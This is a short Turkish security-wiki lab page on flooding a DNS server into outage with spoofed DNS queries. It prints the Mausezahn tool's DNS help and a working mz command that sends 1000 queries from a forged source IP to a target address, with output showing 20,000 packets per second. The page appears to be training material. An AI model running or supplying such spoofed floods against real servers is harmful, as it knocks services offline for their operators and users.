Sahte Alan Adları Kullanarak DNS Flood DDoS Saldırısı

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Mz aracı kullanılarak sahte alan adları ile DNS sunucunun meşgul edilmesi ve servisin hizmet dışı kalması.

Araç:

  • Mz

Lab Senaryosu:

Bu makalede DNS paketlerini üretmek için mz aracı kullanılacaktır. Mz aracı kullanılarak üretilecek DNS paketlerinin parametreleriyle ilgili detaylı bilgiye aşağıdaki gibi ulaşılabilir.

root@bt:~# mz -t dns help

Mausezahn 0.34.9 - (C) 2007-2009 by Herbert Haas - http://www.perihel.at/sec/mz/
| DNS type: Send Domain Name System Messages.
|
| Generally there are two interesting general DNS messages: queries and answers. The easiest
| way is to use the following syntax:
|
|   query|q = <name>[:<type>]  ............. where type is per default "A"
|                          		                    	(and class is always "IN")
|
|   answer|a = [<type>:<ttl>:]<rdata> ...... ttl is per default 0.
|	   	        	= [<type>:<ttl>:]<rdata>/[<type>:<ttl>:]<rdata>/...
|
| Note: If you only use the 'query' option then a query is sent. If you additonally add
|         	      	an 'answer' then an answer is sent.
|
| Examples:
|
|   q = www.xyz.com
|   q = www.xyz.com, a=192.168.1.10
|   q = www.xyz.com, a=A:3600:192.168.1.10
|   q = www.xyz.com, a=CNAME:3600:abc.com/A:3600:192.168.1.10
|
| Note: <type> can be: A, CNAME, or any integer
|
|
| OPTIONAL parameter hacks: (if you don't know what you do this might cause invalid packets)
|
|   Parameter        	        Description                   		            query / reply)
|   -------------------------------------------------------------------------------------
|
|   request/response|reply ..... flag only                   		        	request / n.a.
|   id ......................... packet id (0-65535)         	         	random  / random
|   opcode (or op) ............. accepts values 0..15 or one of 	           	std  / 0
|                              	        	these keywords:
|       	        	= std ................... Standard Query
|       	        	= inv ................... Inverse Query
|       	        	= sts ................... Server Status Request
|   aa or !aa .................. Authoritative Answer         		        	UNSET  / SET
|   tc or !tc .................. Truncation                   	           	UNSET  / UNSET
|   rd or !rd .................. Recursion Desired              	 	                 SET  / SET
|   ra or !ra .................. Recursion Available          	  	                   UNSET  / SET
|   z .......................... Reserved (takes values 0..7)     	        	      	0  / 0
|                              	        	(z=2...authenticated)
|   rcode ...................... Response Code (0..15); interesting                       0  / 0
|                              	        	values are:
|       	     	   = 0 ...................... No Error Condition
|       	     	   = 1 ...................... Unable to interprete query due to format error
|       	     	   = 2 ...................... Unable to process due to server failure
|       	     	   = 3 ...................... Name in query does not exist
|       	     	   = 4 ...................... Type of query not supported
|       	     	   = 5 ...................... Query refused
|
| Count values (values 0..65535) will be set automatically! You should not set these
| values manually except you are interested in invalid packets.
|   qdcount (or qdc) ........... Number of entries in question section	      	  1  / 1
|   ancount (or anc) ........... Number of RRs in answer records section  	  0  / 1
|   nscount (or nsc) ........... Number of name server RRs in authority    	   0  / 0
|                              	        	records section
|   arcount (or arc) ........... Number of RRs in additional records section      0  / 0 

Mz aracı kullanılarak hedef DNS servisine sahte IP adreslerinden gelecek şekilde DNS istekleri göndererek DNS servisinin meşgul edilmesi ve hizmet dışı bırakılmasına ilişkin uygulama aşağıdaki tabloda gösterilmiştir.

root@bt:~# mz -A 5.5.5.5 -B 1.2.39.40 -t dns "q=www.bga.com.tr" -c 1000
Mausezahn will send 1000 frames... 0.05 seconds (20000 packets per second)